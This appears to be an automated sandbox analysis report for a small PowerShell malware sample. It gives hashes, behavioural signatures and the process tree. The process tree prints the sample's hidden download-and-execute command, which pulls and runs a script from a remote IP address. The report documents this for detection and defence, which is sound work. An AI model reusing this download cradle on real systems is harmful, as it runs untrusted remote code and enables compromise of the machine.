Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
22-05-2024 14:14
Static task
static1
Behavioral task
behavioral1
Sample
file.ps1
Resource
win7-20240419-en
Behavioral task
behavioral2
Sample
file.ps1
Resource
win10v2004-20240426-en
General
-
Target
file.ps1
-
Size
122B
-
MD5
5f9a4c3c84f34bc79deb60a5830c5805
-
SHA1
ade96f59bd66bcdb035c3da42bf20728c72a615e
-
SHA256
70a6b7853cd9d96de8afc6e9a562df366966054f33ab4201e5c89aa2647ed196
-
SHA512
9d6512905d5adce0a9b19687e45705f9b3bf59832fb8cf02cbbb2ddeff394a3a7bbb888072b3463bcc7548afc1644d35af3dd04c736dac3c4fce081865cbe01d
Malware Config
Extracted
http://31.41.244.192:80/645gkdkfgd
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 3 1892 powershell.exe -
pid Process 3152 powershell.exe 1892 powershell.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 3152 powershell.exe 3152 powershell.exe 1892 powershell.exe 1892 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 3152 powershell.exe Token: SeDebugPrivilege 1892 powershell.exe -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 3152 wrote to memory of 1892 3152 powershell.exe 83 PID 3152 wrote to memory of 1892 3152 powershell.exe 83
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\file.ps11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3152 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://31.41.244.192:80/645gkdkfgd'))"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1892
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
64B
MD55caad758326454b5788ec35315c4c304
SHA13aef8dba8042662a7fcf97e51047dc636b4d4724
SHA25683e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
SHA5124e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82